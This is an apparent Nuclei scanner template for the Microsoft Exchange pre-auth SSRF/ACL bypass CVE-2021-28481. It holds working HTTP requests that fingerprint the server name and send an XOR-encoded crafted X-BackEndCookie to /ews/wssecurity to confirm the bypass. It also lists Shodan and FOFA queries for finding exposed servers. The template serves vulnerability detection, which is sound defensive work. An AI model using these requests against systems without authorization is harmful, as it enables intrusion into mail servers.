Microsoft Exchange - Pre-Auth SSRF / ACL Bypass (ProxyNotFound)

id: CVE-2021-28481

info:
  name: Microsoft Exchange - Pre-Auth SSRF / ACL Bypass (ProxyNotFound)
  author: daffainfo
  severity: critical
  description: |
    Microsoft Exchange Server contains a remote code execution caused by improper input validation in the server component, letting remote attackers execute arbitrary code, exploit requires network access to the server.
  impact: |
    Attackers can execute arbitrary code remotely, potentially leading to full system compromise or data breach
  remediation: |
    Apply the latest security patches and updates provided by Microsoft for Exchange Server
  reference:
    - https://sec.vnpt.vn/2021/04/microsoft-exchange-from-deserialization-to-post-auth-rce-cve-2021-28482
    - https://hitcon.org/2021/agenda/279d7810-e619-4dc3-9113-b11bad5277ec/The%20Proxy%20Era%20of%20Microsoft%20Exchange%20Server.pdf
    - https://www.youtube.com/watch?v=vn4niT9XEIM
    - https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2021-28481
    - https://nvd.nist.gov/vuln/detail/cve-2021-28481
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-28481
    cwe-id: D-CWE-noinfo
    epss-score: 0.34359
    epss-percentile: 0.97053
    cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_20:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_9:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: microsoft
    product: exchange_server
    shodan-query:
      - http.favicon.hash:1768726119
      - http.title:"outlook"
      - cpe:"cpe:2.3:a:microsoft:exchange_server"
    fofa-query:
      - title="outlook"
      - icon_hash=1768726119
    google-query: intitle:"outlook"
  tags: cve,cve2021,ssrf,rce,exchange,microsoft,vkev

variables:
  email: '{{rand_base(5)}}@{{rand_base(5)}}.com'
  epoch: '{{unix_time()}}'
  date: '{{date_time("%Y-%M-%DT%H:%m:%s")}}'

flow: |
  http(1)
  let servername = template.servername;
  let epoch = template.epoch;
  let date = template.date;
  let str = "Server~x]@" + servername.toLowerCase() + ":444/owa/auth/logon.aspx?a.a#~" + epoch + "~" + date;
  let result = "";

  for (let i = 0; i < str.length; i++) {
    let xorChar = str.charCodeAt(i) ^ 0xff;
    result += xorChar.toString(16).padStart(2, "0");
  }

  set("rawXor", result);
  http(2)

http:
  - raw:
      - |
        GET /owa/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(to_lower(header), "x-feserver")'
        condition: and
        internal: true

    extractors:
      - type: kval
        name: servername
        kval:
          - x_feserver
        internal: true

  - raw:
      - |
        POST /ews/wssecurity HTTP/1.1
        Host: {{Hostname}}
        Cookie: X-BackEndCookie={{email}}={{base64(hex_decode(rawXor))}}
        X-AnchorMailbox: {{email}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "/owa/auth/errorFE.aspx"
        condition: and

      - type: word
        part: header
        words:
          - "X-Calculatedbetarget"
          - "X-Owa-Error"
        condition: and
        case-insensitive: true

      - type: status
        status:
          - 302
# digest: 490a0046304402200b240e1f4fe341cd0e657b7d6802bc5367ea35dccaf4072f0a77ed2438ac40c902207ea8f160b814e3265577e20b6bbe01670002354fe74086d90f33cc818b7d85b2:922c64590222798bb761d5b6d8e72950